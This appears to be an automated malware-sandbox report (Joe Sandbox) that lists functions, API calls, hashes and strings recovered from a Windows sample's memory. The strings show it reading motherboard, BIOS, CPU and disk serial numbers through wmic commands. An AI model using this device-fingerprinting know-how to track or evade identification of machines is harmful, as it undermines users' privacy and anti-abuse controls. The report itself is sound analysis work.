                                                                                                                  Function 00007FF77C91FE40 Relevance: .1, Instructions: 111COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.3719113689.00007FF77C911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF77C910000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.3719048759.00007FF77C910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.3719224107.00007FF77C923000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.3719312989.00007FF77C927000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.3719399470.00007FF77C928000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff77c910000_18sFhgSyVK.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: d6493d6e35529629c397c204590ddb3bde36fd56b60c7bb670539de328662dbf
                                                                                                                  • Instruction ID: 3f473e40351afb635ebfc9a0f8ea26bfe7bcebf9404af19de7c502ad090ec797
                                                                                                                  • Opcode Fuzzy Hash: d6493d6e35529629c397c204590ddb3bde36fd56b60c7bb670539de328662dbf
                                                                                                                  • Instruction Fuzzy Hash: 18418633B255548BD78CCE29C8266AD73A2F39D304F85C639EB1AC7385DA39D905CB40
                                                                                                                  Function 00007FF77C920E04 Relevance: .0, Instructions: 2COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.3719113689.00007FF77C911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF77C910000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.3719048759.00007FF77C910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.3719224107.00007FF77C923000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.3719312989.00007FF77C927000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.3719399470.00007FF77C928000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff77c910000_18sFhgSyVK.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 4a4eae3f1ed72a30295386fd46d0c16acbfbb20c65eb9c05bf2fee24b2204ffb
                                                                                                                  • Instruction ID: 8a3b7abaf18fc3ed78a56484babad5b536995515748f1ffb0dd20b8c8af71afc
                                                                                                                  • Opcode Fuzzy Hash: 4a4eae3f1ed72a30295386fd46d0c16acbfbb20c65eb9c05bf2fee24b2204ffb
                                                                                                                  • Instruction Fuzzy Hash: 3DA001629BCC0AD1E784AB04A950621E224BB58300B825071C08D411649E7CA9508A31
                                                                                                                  Function 00007FF77C912EF0 Relevance: 37.0, APIs: 11, Strings: 10, Instructions: 221sleepprocessCOMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                  • Beep.KERNEL32 ref: 00007FF77C912F0C
                                                                                                                  • Sleep.KERNEL32 ref: 00007FF77C912F17
                                                                                                                  • system.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF77C912F24
                                                                                                                    • Part of subcall function 00007FF77C91E570: memcpy.VCRUNTIME140(?,00000000,?,00007FF77C912F43), ref: 00007FF77C91E5D1
                                                                                                                    • Part of subcall function 00007FF77C91E570: memcpy.VCRUNTIME140(?,00000000,?,00007FF77C912F43), ref: 00007FF77C91E663
                                                                                                                    • Part of subcall function 00007FF77C91E570: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF77C91E689
                                                                                                                    • Part of subcall function 00007FF77C91EC40: GetStdHandle.KERNEL32(?,00000000,00000000,00007FF77C912FBF), ref: 00007FF77C91EC80
                                                                                                                    • Part of subcall function 00007FF77C91EC40: SetConsoleTextAttribute.KERNEL32(?,00000000,00000000,00007FF77C912FBF), ref: 00007FF77C91EC8C
                                                                                                                    • Part of subcall function 00007FF77C91EC40: GetStdHandle.KERNEL32(?,00000000,00000000,00007FF77C912FBF), ref: 00007FF77C91ECB2
                                                                                                                    • Part of subcall function 00007FF77C91EC40: SetConsoleTextAttribute.KERNEL32(?,00000000,00000000,00007FF77C912FBF), ref: 00007FF77C91ECBF
                                                                                                                  • system.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF77C912FD2
                                                                                                                  • Sleep.KERNEL32 ref: 00007FF77C912FDD
                                                                                                                    • Part of subcall function 00007FF77C91E570: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,00000000,?,00007FF77C912F43), ref: 00007FF77C91E640
                                                                                                                    • Part of subcall function 00007FF77C91F0C0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,?,?,00007FF77C912F66), ref: 00007FF77C91F1E2
                                                                                                                    • Part of subcall function 00007FF77C91F0C0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,?,?,00007FF77C912F66), ref: 00007FF77C91F1E9
                                                                                                                    • Part of subcall function 00007FF77C91E450: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,00007FF77C912FCB), ref: 00007FF77C91E500
                                                                                                                  • system.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF77C91308B
                                                                                                                  • Sleep.KERNEL32 ref: 00007FF77C913096
                                                                                                                  • system.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF77C913144
                                                                                                                  • Sleep.KERNEL32 ref: 00007FF77C91314F
                                                                                                                  • system.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF77C9131FD
                                                                                                                  • Sleep.KERNEL32 ref: 00007FF77C913208
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.3719113689.00007FF77C911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF77C910000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.3719048759.00007FF77C910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.3719224107.00007FF77C923000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.3719312989.00007FF77C927000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.3719399470.00007FF77C928000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff77c910000_18sFhgSyVK.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Sleepsystem$_invalid_parameter_noinfo_noreturn$AttributeConsoleHandleTextmemcpy$BeepConcurrency::cancel_current_task
                                                                                                                  • String ID: Going back to Dashboard in 10 Seconds...$Bios SN:$Cpu SN:$DiskDrive SN:$ BaseBoard SN:$cls$wmic baseboard get serialnumber$wmic bios get serialnumber$wmic cpu get serialnumber$wmic diskdrive get serialnumber
                                                                                                                  • API String ID: 2072207396-883933296
                                                                                                                  • Opcode ID: 060b8f6e4652b921ad9382c2b9c02ee57329f16bcacb0801ecaa46bd7145b31f
                                                                                                                  • Instruction ID: 795ee288d941864e8c050f61271750a3753586a4a74d9d16193dde7d89025c1a
                                                                                                                  • Opcode Fuzzy Hash: 060b8f6e4652b921ad9382c2b9c02ee57329f16bcacb0801ecaa46bd7145b31f
                                                                                                                  • Instruction Fuzzy Hash: 5BB10E33B35A029AFB40EF60D4551ECB375BF49348FC05936DA4D526A9EE38E609C7A0
                                                                                                                  Function 00007FF77C911740 Relevance: 23.0, APIs: 1, Strings: 12, Instructions: 251COMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00007FF77C9201C0: malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF77C9201DA
                                                                                                                  • __std_exception_copy.VCRUNTIME140 ref: 00007FF77C911C84
                                                                                                                    • Part of subcall function 00007FF77C9201C0: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF77C9201F0
                                                                                                                    • Part of subcall function 00007FF77C9201C0: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF77C9201F6
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.3719113689.00007FF77C911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF77C910000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.3719048759.00007FF77C910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.3719224107.00007FF77C923000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.3719312989.00007FF77C927000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.3719399470.00007FF77C928000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff77c910000_18sFhgSyVK.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Concurrency::cancel_current_task$__std_exception_copymalloc
                                                                                                                  • String ID: aqua$black$blue$green$grey$hite$llow$purple$red$rple$white$yellow
                                                                                                                  • API String ID: 1777453549-4160983169
                                                                                                                  • Opcode ID: ccd7cb16edb6cb11090e525c8ddefe8df58638e67e087e0fe80ce8fba7c07e5b
                                                                                                                  • Instruction ID: 44d21c672b593f2bb552c1d9f7265dcae96e142b8055a176685cdd9223d9ac6e
                                                                                                                  • Opcode Fuzzy Hash: ccd7cb16edb6cb11090e525c8ddefe8df58638e67e087e0fe80ce8fba7c07e5b
                                                                                                                  • Instruction Fuzzy Hash: 95E14033928BC18EE361DF35E8403E9B7B4FB9D348F515225EAC856A59DF789284CB10
                                                                                                                  Function 00007FF77C91E8E0 Relevance: 13.6, APIs: 9, Instructions: 133COMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 1264 7ff77c91e8e0-7ff77c91e91c 1265 7ff77c91e91e-7ff77c91e924 1264->1265 1266 7ff77c91e925-7ff77c91e937 ?good@ios_base@std@@QEBA_NXZ 1264->1266 1265->1266 1267 7ff77c91e969-7ff77c91e96f 1266->1267 1268 7ff77c91e939-7ff77c91e948 1266->1268 1271 7ff77c91ea46-7ff77c91ea74 ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z ?uncaught_exception@std@@YA_NXZ 1267->1271 1272 7ff77c91e975-7ff77c91e99b 1267->1272 1269 7ff77c91e967 1268->1269 1270 7ff77c91e94a-7ff77c91e94d 1268->1270 1269->1267 1270->1269 1276 7ff77c91e94f-7ff77c91e965 ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@XZ ?good@ios_base@std@@QEBA_NXZ 1270->1276 1274 7ff77c91ea80-7ff77c91ea8f 1271->1274 1275 7ff77c91ea76-7ff77c91ea7f ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAXXZ 1271->1275 1277 7ff77c91e9dd-7ff77c91e9ff ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z 1272->1277 1278 7ff77c91e99d 1272->1278 1279 7ff77c91ea98-7ff77c91eaae 1274->1279 1280 7ff77c91ea91-7ff77c91ea97 1274->1280 1275->1274 1276->1267 1282 7ff77c91ea00-7ff77c91ea02 1277->1282 1281 7ff77c91e9a0-7ff77c91e9a2 1278->1281 1280->1279 1283 7ff77c91e9a8-7ff77c91e9ab 1281->1283 1284 7ff77c91ea36 1281->1284 1282->1284 1285 7ff77c91ea04-7ff77c91ea07 1282->1285 1287 7ff77c91e9da 1283->1287 1288 7ff77c91e9ad-7ff77c91e9d8 ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z 1283->1288 1284->1271 1285->1284 1289 7ff77c91ea09-7ff77c91ea34 ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z 1285->1289 1287->1277 1288->1281 1289->1282
                                                                                                                  APIs
                                                                                                                  • ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF77C91E92F
                                                                                                                  • ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@XZ.MSVCP140 ref: 00007FF77C91E94F
                                                                                                                  • ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF77C91E95F
                                                                                                                  • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140 ref: 00007FF77C91E9BE
                                                                                                                  • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140 ref: 00007FF77C91E9EA
                                                                                                                  • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140 ref: 00007FF77C91EA1A
                                                                                                                  • ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF77C91EA65
                                                                                                                  • ?uncaught_exception@std@@YA_NXZ.MSVCP140 ref: 00007FF77C91EA6C
                                                                                                                  • ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAXXZ.MSVCP140 ref: 00007FF77C91EA79
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.3719113689.00007FF77C911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF77C910000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.3719048759.00007FF77C910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.3719224107.00007FF77C923000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.3719312989.00007FF77C927000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.3719399470.00007FF77C928000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff77c910000_18sFhgSyVK.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: D@std@@@std@@U?$char_traits@$?sputc@?$basic_streambuf@$?good@ios_base@std@@$?flush@?$basic_ostream@?setstate@?$basic_ios@?uncaught_exception@std@@Osfx@?$basic_ostream@V12@
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 834659371-0
                                                                                                                  • Opcode ID: e945296501283069838657582e9f6794fd260e56a823f0a3144722e42b279260
                                                                                                                  • Instruction ID: 4501cf1f7c2a61102149a14888f446a5d3ef490eeebd3a5f452ac16b9a0ee157
                                                                                                                  • Opcode Fuzzy Hash: e945296501283069838657582e9f6794fd260e56a823f0a3144722e42b279260
                                                                                                                  • Instruction Fuzzy Hash: 51514333728A4187EF649F19E494239F7A0FB89F95B558936CA8E437A0CF39D4458710
                                                                                                                  Function 00007FF77C91FFD0 Relevance: 13.6, APIs: 9, Instructions: 131COMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 1290 7ff77c91ffd0-7ff77c920004 1291 7ff77c920010 1290->1291 1292 7ff77c920006-7ff77c920009 1290->1292 1294 7ff77c920012-7ff77c920022 1291->1294 1292->1291 1293 7ff77c92000b-7ff77c92000e 1292->1293 1293->1294 1295 7ff77c92002b-7ff77c92003d ?good@ios_base@std@@QEBA_NXZ 1294->1295 1296 7ff77c920024-7ff77c92002a 1294->1296 1297 7ff77c92006f-7ff77c920075 1295->1297 1298 7ff77c92003f-7ff77c92004e 1295->1298 1296->1295 1299 7ff77c920077-7ff77c92007c 1297->1299 1300 7ff77c920081-7ff77c920094 1297->1300 1302 7ff77c92006d 1298->1302 1303 7ff77c920050-7ff77c920053 1298->1303 1304 7ff77c920131-7ff77c92014f ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z ?uncaught_exception@std@@YA_NXZ 1299->1304 1305 7ff77c9200c7-7ff77c9200e2 ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J@Z 1300->1305 1306 7ff77c920096-7ff77c920099 1300->1306 1302->1297 1303->1302 1307 7ff77c920055-7ff77c92006b ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@XZ ?good@ios_base@std@@QEBA_NXZ 1303->1307 1311 7ff77c92015b-7ff77c92016a 1304->1311 1312 7ff77c920151-7ff77c92015a ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAXXZ 1304->1312 1309 7ff77c92010a-7ff77c92010d 1305->1309 1310 7ff77c9200e4-7ff77c9200e7 1305->1310 1306->1305 1308 7ff77c92009b-7ff77c9200b5 ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z 1306->1308 1307->1297 1315 7ff77c9200b7-7ff77c9200c0 1308->1315 1316 7ff77c9200c2-7ff77c9200c5 1308->1316 1318 7ff77c920111-7ff77c920121 1309->1318 1317 7ff77c9200e9-7ff77c920103 ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z 1310->1317 1310->1318 1313 7ff77c92016c-7ff77c920172 1311->1313 1314 7ff77c920173-7ff77c920187 1311->1314 1312->1311 1313->1314 1315->1310 1316->1306 1317->1309 1319 7ff77c920105-7ff77c920108 1317->1319 1318->1304 1319->1310
                                                                                                                  APIs
                                                                                                                  • ?good@ios_base@std@@QEBA_NXZ.MSVCP140(?,00007FFB1BAE6000,?,00000007,?,00007FF77C91ECAD,?,00000000,00000000,00007FF77C912FBF), ref: 00007FF77C920035
                                                                                                                  • ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@XZ.MSVCP140(?,00007FFB1BAE6000,?,00000007,?,00007FF77C91ECAD,?,00000000,00000000,00007FF77C912FBF), ref: 00007FF77C920055
                                                                                                                  • ?good@ios_base@std@@QEBA_NXZ.MSVCP140(?,00007FFB1BAE6000,?,00000007,?,00007FF77C91ECAD,?,00000000,00000000,00007FF77C912FBF), ref: 00007FF77C920065
                                                                                                                  • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140(?,00007FFB1BAE6000,?,00000007,?,00007FF77C91ECAD,?,00000000,00000000,00007FF77C912FBF), ref: 00007FF77C9200AC
                                                                                                                  • ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J@Z.MSVCP140(?,00007FFB1BAE6000,?,00000007,?,00007FF77C91ECAD,?,00000000,00000000,00007FF77C912FBF), ref: 00007FF77C9200D9
                                                                                                                  • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140(?,00007FFB1BAE6000,?,00000007,?,00007FF77C91ECAD,?,00000000,00000000,00007FF77C912FBF), ref: 00007FF77C9200FA
                                                                                                                  • ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140(?,00007FFB1BAE6000,?,00000007,?,00007FF77C91ECAD,?,00000000,00000000,00007FF77C912FBF), ref: 00007FF77C920140
                                                                                                                  • ?uncaught_exception@std@@YA_NXZ.MSVCP140(?,00007FFB1BAE6000,?,00000007,?,00007FF77C91ECAD,?,00000000,00000000,00007FF77C912FBF), ref: 00007FF77C920147
                                                                                                                  • ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAXXZ.MSVCP140(?,00007FFB1BAE6000,?,00000007,?,00007FF77C91ECAD,?,00000000,00000000,00007FF77C912FBF), ref: 00007FF77C920154
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.3719113689.00007FF77C911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF77C910000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.3719048759.00007FF77C910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.3719224107.00007FF77C923000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.3719312989.00007FF77C927000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.3719399470.00007FF77C928000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff77c910000_18sFhgSyVK.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: D@std@@@std@@U?$char_traits@$?good@ios_base@std@@?sputc@?$basic_streambuf@$?flush@?$basic_ostream@?setstate@?$basic_ios@?sputn@?$basic_streambuf@?uncaught_exception@std@@Osfx@?$basic_ostream@V12@
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3274656010-0
                                                                                                                  • Opcode ID: db6c70190aec334825d9273a46475c815c121ea3edde583794e7a8720064cae9
                                                                                                                  • Instruction ID: cbac0c0074b93c9c77533226fbdef71c3fa960b293bee1fc1e43c0921885924d
                                                                                                                  • Opcode Fuzzy Hash: db6c70190aec334825d9273a46475c815c121ea3edde583794e7a8720064cae9
                                                                                                                  • Instruction Fuzzy Hash: 98513133A28A41C1EBA0AF19D590638E7A0FF48F95F569532CE8E43761CE3DD546CB10
                                                                                                                  Function 00007FF77C91F9E0 Relevance: 10.3, APIs: 8, Instructions: 316COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.3719113689.00007FF77C911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF77C910000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.3719048759.00007FF77C910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.3719224107.00007FF77C923000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.3719312989.00007FF77C927000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.3719399470.00007FF77C928000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff77c910000_18sFhgSyVK.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: memcmp
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1475443563-0
                                                                                                                  • Opcode ID: 11155f9b16eb204b294106ecc9b2bf537a94a7bfac453e69b393a81466b4d626
                                                                                                                  • Instruction ID: 750633403f31ce5d45e2727c6bc2e7a19581821911bdee387541563860c1136f
                                                                                                                  • Opcode Fuzzy Hash: 11155f9b16eb204b294106ecc9b2bf537a94a7bfac453e69b393a81466b4d626
                                                                                                                  • Instruction Fuzzy Hash: 55D1C263A387899BEBA0AF15C145278A7A1F708BC8F984835CF4D47781EF78E590D760
                                                                                                                  Function 00007FF77C911F10 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 139COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.3719113689.00007FF77C911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF77C910000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.3719048759.00007FF77C910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.3719224107.00007FF77C923000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.3719312989.00007FF77C927000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.3719399470.00007FF77C928000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff77c910000_18sFhgSyVK.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: memcmp$Xout_of_range@std@@_invalid_parameter_noinfo_noreturn
                                                                                                                  • String ID: invalid map<K, T> key
                                                                                                                  • API String ID: 3077429687-1394099236
                                                                                                                  • Opcode ID: fc54e7dc20ef8fa7a6d2055d04a8e0df734460aeb4a23465d65b5cfd4cca9832
                                                                                                                  • Instruction ID: e0df324a83522ba898f31b4faa6332acf0376626287ba2db93e713de3e4a6803
                                                                                                                  • Opcode Fuzzy Hash: fc54e7dc20ef8fa7a6d2055d04a8e0df734460aeb4a23465d65b5cfd4cca9832
                                                                                                                  • Instruction Fuzzy Hash: 1F51A163A38A81DBEBA0BB15D1412B9A361FB09B84F844531DB4D07796CF3CE9A1CB50
                                                                                                                  Function 00007FF77C921F7F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 28COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.3719113689.00007FF77C911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF77C910000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.3719048759.00007FF77C910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.3719224107.00007FF77C923000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.3719312989.00007FF77C927000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.3719399470.00007FF77C928000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff77c910000_18sFhgSyVK.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: __current_exception__current_exception_contextterminate
                                                                                                                  • String ID: csm
                                                                                                                  • API String ID: 2542180945-1018135373
                                                                                                                  • Opcode ID: cd019ef16df940bed00e9740f148891af4e9689f87106364619b787730ce4f61
                                                                                                                  • Instruction ID: 51ba2d2278955011b82c274edf95e9f280e1aecf9457a6e15cc354ae8acc3a43
                                                                                                                  • Opcode Fuzzy Hash: cd019ef16df940bed00e9740f148891af4e9689f87106364619b787730ce4f61
                                                                                                                  • Instruction Fuzzy Hash: F3F0F937565B84CAD754AF21EC800AC7764F74CB98B8A5130FA8D47755CF38D8A0DB50
                                                                                                                  Function 00007FF77C91EDB0 Relevance: 6.1, APIs: 4, Instructions: 115COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.3719113689.00007FF77C911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF77C910000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.3719048759.00007FF77C910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.3719224107.00007FF77C923000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.3719312989.00007FF77C927000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.3719399470.00007FF77C928000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff77c910000_18sFhgSyVK.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: memcpy$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1775671525-0
                                                                                                                  • Opcode ID: a7d10abafe5d7e5f0ee855d48d449e1a98ca8453291bb6177871cc32d87bbc6a
                                                                                                                  • Instruction ID: fa97d29f3f28abac9478b64d1f78a97204d4006a8059b3fa6f4ad3093aee1756
                                                                                                                  • Opcode Fuzzy Hash: a7d10abafe5d7e5f0ee855d48d449e1a98ca8453291bb6177871cc32d87bbc6a
                                                                                                                  • Instruction Fuzzy Hash: 6A31B223B397819BEF60EF1195492A9F251AB08BD0F984A35EEAD077D5DF3CE0518710
                                                                                                                  Function 00007FF77C91E570 Relevance: 6.1, APIs: 4, Instructions: 80COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • memcpy.VCRUNTIME140(?,00000000,?,00007FF77C912F43), ref: 00007FF77C91E5D1
                                                                                                                  • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,00000000,?,00007FF77C912F43), ref: 00007FF77C91E640
                                                                                                                    • Part of subcall function 00007FF77C9201C0: malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF77C9201DA
                                                                                                                  • memcpy.VCRUNTIME140(?,00000000,?,00007FF77C912F43), ref: 00007FF77C91E663
                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF77C91E689
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.3719113689.00007FF77C911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF77C910000, based on PE: true
